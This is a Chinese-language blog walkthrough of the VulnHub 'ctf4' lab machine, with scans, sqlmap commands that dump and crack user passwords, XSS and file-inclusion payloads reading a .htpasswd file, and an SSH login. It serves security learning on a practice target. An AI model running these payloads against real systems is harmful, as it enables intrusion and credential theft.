渗透测试系列 — VulnHub–ctf4

正文:

1.
御剑,dirb   扫目录
2.
robots.txt

User-agent: *
Disallow: /mail/
Disallow: /restricted/
Disallow: /conf/
Disallow: /sql/
Disallow: /admin/

3.
http://192.168.244.141/calendar/index.php?action=admin
http://192.168.244.141/conf/==http://192.168.244.141/mail/src/login.php
http://192.168.244.141/admin/
3个登陆界面
4.
nmap -A -p0-65535 192.168.244.141
HTTPrint  这个也是web指纹识别工具,没有用过
nmap够用了

Starting Nmap 7.60 ( https://nmap.org ) at 2018-07-09 21:51 CST
Nmap scan report for 192.168.244.141
Host is up (0.00033s latency).
Not shown: 65532 filtered ports
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 10:4a:18:f8:97:e0:72:27:b5:a4:33:93:3d:aa:9d:ef (DSA)
|_  2048 e7:70:d3:81:00:41:b8:6e:fd:31:ae:0e:00:ea:5c:b4 (RSA)
25/tcp  open   smtp    Sendmail 8.13.5/8.13.5
| smtp-commands: ctf4.sas.upenn.edu Hello [192.168.244.129], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP,
|_ 2.0.0 This is sendmail version 8.13.5 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP ". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp  open   http    Apache httpd 2.2.0 ((Fedora))
| http-robots.txt: 5 disallowed entries
|_/mail/ /restricted/ /conf/ /sql/ /admin/
|_http-server-header: Apache/2.2.0 (Fedora)
|_http-title:  Prof. Ehks
631/tcp closed ipp
MAC Address: 00:0C:29:28:D9:61 (VMware)
Device type: general purpose|proxy server|remote management|terminal server|switch|WAP
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (98%), SonicWALL embedded (95%), Control4 embedded (95%), Lantronix embedded (95%), SNR embedded (95%), Dell iDRAC 6 (94%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:sonicwall:aventail_ex-6000 cpe:/h:lantronix:slc_8 cpe:/h:snr:snr-s2960 cpe:/o:dell:idrac6_firmware cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel:4.1
Aggressive OS guesses: Linux 2.6.16 - 2.6.21 (98%), Linux 2.6.13 - 2.6.32 (96%), SonicWALL Aventail EX-6000 VPN appliance (95%), Control4 HC-300 home controller (95%), Lantronix SLC 8 terminal server (Linux 2.6) (95%), SNR SNR-S2960 switch (95%), Linux 2.6.8 - 2.6.30 (94%), Linux 2.6.9 - 2.6.18 (94%), Dell iDRAC 6 remote access controller (Linux 2.6) (94%), Linux 2.6.18 - 2.6.32 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: ctf4.sas.upenn.edu; OS: Unix
TRACEROUTE
HOP RTT     ADDRESS
1   0.33 ms 192.168.244.141
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.17 seconds

5.工具扫描
Nessus  kali上没有
Nikto
6.sql
sqlmap -r “post.txt” -p username,password –batch –dbms=mysql –dbs
sqlmap -u “” –forms
[*] calendar
[*] ehks
[*] information_schema
[*] mysql
[*] roundcubemail
[*] test
sqlmap -r “post.txt” -p username,password –batch –dbms=mysql -D calendar -T phpc_users -C “username,password” –dump
username | password |
+———–+————————————————–+
| anonymous | <blank> |
| dstevens | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf) |
| jdurbin | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978) |
| pmoore | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite) |
| admin | a0e7b2a565119c0a7ec3126a16016113 (calendar) |
| achen | b46265f1e7faa3beab09db5c28739380 (seventysixers)
sqlmap -r “post.txt” -p username,password –batch –dbms=mysql -D ehks -T user -C “user_name,user_pass” –dump
| user_name | user_pass |
+———–+————————————————–+
| achen | b46265f1e7faa3beab09db5c28739380 (seventysixers) |
| dstevens | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf) |
| ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1) |
| jdurbin | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978) |
| pmoore | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite) |
| sorzek | 64d1f88b9b276aece4b0edcc25b7a434 (pacman)
7.xss
<script>alert(“xss”)</script>
可以
http://192.168.244.141/?title=</title><script>location.href=’https://www.baidu.com/’;</script>跳转成功
8.
文件包含
page=../inc/header
Forbidden
restricted/.htpasswd
http://192.168.244.141/?page=../restricted/.htpasswd%00  (有待理解)
nothing<?php$page=$_GET[‘page’];include($page.”.php”);>
得到:
ghighland:8RkVRDjjkJhq6 pmoore:xHaymgB2KxbJU jdurbin:DPdoXSwmSWpYo sorzek:z/a8PtVaqxwWg
9.htpasswd密码爆破
john、hydra、medusa
利用John和L0phtCrack批量破解htpasswd
https://blog.csdn.net/liushu_it/article/details/18735857
john
http://www.openwall.com/john/doc/FAQ.shtml
No password hashes loaded (see FAQ)
john htpasswd –show
sorzek:pacman
10.ssh上去
[sorzek@ctf4 ~]$ ls
mail
[sorzek@ctf4 ~]$ pwd
/home/sorzek
[sorzek@ctf4 ~]$ whoami
sorzek
[sorzek@ctf4 ~]$ ls -la
total 64
drwxr-xr-x 3 sorzek users 4096 Mar 10 2009 .
drwxr-xr-x 8 root users 4096 Mar 6 2009 ..
-rw——- 1 sorzek sorzek 16 Mar 9 2009 .bash_history
-rw-r–r– 1 sorzek sorzek 24 Mar 6 2009 .bash_logout
-rw-r–r– 1 sorzek sorzek 191 Mar 6 2009 .bash_profile
-rw-r–r– 1 sorzek sorzek 124 Mar 6 2009 .bashrc
-rw-r–r– 1 sorzek sorzek 120 Mar 6 2009 .gtkrc
drwx—— 3 sorzek sorzek 4096 Mar 10 2009 mail
[sorzek@ctf4 ~]$
[sorzek@ctf4 ~]$ cat /etc/*-release
Fedora Core release 5 (Bordeaux)
Fedora Core release 5 (Bordeaux)
[sorzek@ctf4 ~]$ uname -a
Linux ctf4.sas.upenn.edu 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux
 
2018.7.9

发表评论

电子邮件地址不会被公开。 必填项已用*标注